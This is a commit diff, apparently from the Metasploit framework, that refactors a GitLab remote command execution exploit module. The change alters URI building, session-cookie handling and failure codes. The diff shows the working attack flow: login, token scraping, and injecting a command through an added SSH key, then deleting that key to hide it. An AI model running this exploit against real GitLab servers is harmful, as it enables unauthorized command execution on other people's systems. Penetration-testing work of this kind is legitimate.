Fix URI building and failure cases

This update uses the normalize_uri method for building
URIs. Additionally, failure cases have been modified
for a less generic version.

Author: kaospunk

modules/exploits/multi/http/gitlab_shell_exec.rb

@@ -69,6 +69,7 @@ def initialize(info = {})
   end
 
   def exploit
+    login
     if target.name == 'Unix (CMD)'
       execute_command(payload.encoded)
     else
@@ -77,15 +78,14 @@ def exploit
   end
 
   def execute_command(cmd, _opts = {})
-    session_cookie = login
-    key_id = add_key(session_cookie, cmd)
-    delete_key(session_cookie, key_id)
+    key_id = add_key(cmd)
+    delete_key(key_id)
   end
 
   def login
     username = datastore['USERNAME']
     password = datastore['PASSWORD']
-    signin_page = datastore['TARGETURI'] + 'users/sign_in'
+    signin_page = normalize_uri(datastore['TARGETURI'], 'users', 'sign_in')
 
     # Get a valid session cookie and authenticity_token for the next step
     res = send_request_cgi(
@@ -94,15 +94,15 @@ def login
                             'uri'    => signin_page
     )
 
-    fail_with(Failure::Unknown, "#{peer} - Connection timed out during login") unless res
+    fail_with(Failure::TimeoutExpired, "#{peer} - Connection timed out during login") unless res
 
-    session_cookie = res.get_cookies.scan(/(_gitlab_session=[a-z0-9]+)/).flatten[0] || ''
+    local_session_cookie = res.get_cookies.scan(/(_gitlab_session=[a-z0-9]+)/).flatten[0] || ''
     auth_token = res.body.scan(/<input name="authenticity_token" type="hidden" value="(.*?)"/).flatten[0]
 
     # Perform the actual login and get the newly assigned session cookie
     res = send_request_cgi(
                             'method' => 'POST',
-                            'cookie' => session_cookie,
+                            'cookie' => local_session_cookie,
                             'uri'    => signin_page,
                             'vars_post' =>
                               {
@@ -116,23 +116,21 @@ def login
 
     fail_with(Failure::NoAccess, "#{peer} - Login failed") unless res
 
-    session_cookie = res.get_cookies.scan(/(_gitlab_session=[a-z0-9]+)/).flatten[0]
-
-    session_cookie
+    @session_cookie = res.get_cookies.scan(/(_gitlab_session=[a-z0-9]+)/).flatten[0]
   end
 
-  def add_key(session_cookie, cmd)
-    add_key_base = datastore['TARGETURI'] + 'profile/keys'
+  def add_key(cmd)
+    add_key_base = normalize_uri(datastore['TARGETURI'], 'profile', 'keys')
 
     # Perform an initial request to get an authenticity_token so the actual
     # key addition can be done successfully.
     res = send_request_cgi(
                             'method' => 'GET',
-                            'cookie' => "request_method=GET; #{session_cookie}",
-                            'uri'    => add_key_base + '/new'
+                            'cookie' => "request_method=GET; #{@session_cookie}",
+                            'uri'    => normalize_uri(add_key_base, 'new')
     )
 
-    fail_with(Failure::Unknown, "#{peer} - Connection timed out during request") unless res
+    fail_with(Failure::TimeoutExpired, "#{peer} - Connection timed out during request") unless res
 
     auth_token = res.body.scan(/<input name="authenticity_token" type="hidden" value="(.*?)"/).flatten[0]
     title = rand_text_alphanumeric(16)
@@ -150,7 +148,7 @@ def add_key(session_cookie, cmd)
 
     res = send_request_cgi(
                             'method' => 'POST',
-                            'cookie' => "request_method=GET; #{session_cookie}",
+                            'cookie' => "request_method=GET; #{@session_cookie}",
                             'uri'    => add_key_base,
                             'vars_post' =>
                               {
@@ -161,39 +159,39 @@ def add_key(session_cookie, cmd)
                               }
                           )
 
-    fail_with(Failure::Unknown, "#{peer} - Request to add key failed") unless res
+    fail_with(Failure::TimeoutExpired, "#{peer} - Connection timed out during request") unless res
 
     # Get the newly added key id so it can be used for cleanup
     key_id = res.headers['Location'].split('/')[-1]
 
     key_id
   end
 
-  def delete_key(session_cookie, key_id)
-    key_base = datastore['TARGETURI'] + 'profile/keys'
+  def delete_key(key_id)
+    key_base = normalize_uri(datastore['TARGETURI'], 'profile', 'keys')
 
     res = send_request_cgi(
                              'method' => 'GET',
-                             'cookie' => "request_method=GET; #{session_cookie}",
+                             'cookie' => "request_method=GET; #{@session_cookie}",
                              'uri'    => key_base
                            )
 
-    fail_with(Failure::Unknown, "#{peer} - Connection timed out during request") unless res
+    fail_with(Failure::TimeoutExpired, "#{peer} - Connection timed out during request") unless res
 
     auth_token = res.body.scan(/<meta content="(.*?)" name="csrf-token"/).flatten[0]
 
     # Remove the key which was added to clean up after ourselves
     res = send_request_cgi(
                              'method' => 'POST',
-                             'cookie' => "#{session_cookie}",
-                             'uri'    => "#{key_base}/#{key_id}",
+                             'cookie' => "#{@session_cookie}",
+                             'uri'    => normalize_uri("#{key_base}", "#{key_id}"),
                              'vars_post' =>
                              {
                                '_method' => 'delete',
                                'authenticity_token' => auth_token
                              }
                            )
 
-    fail_with(Failure::Unknown, "#{peer} - Request to delete key failed") unless res
+    fail_with(Failure::TimeoutExpired, "#{peer} - Connection timed out during request") unless res
   end
 end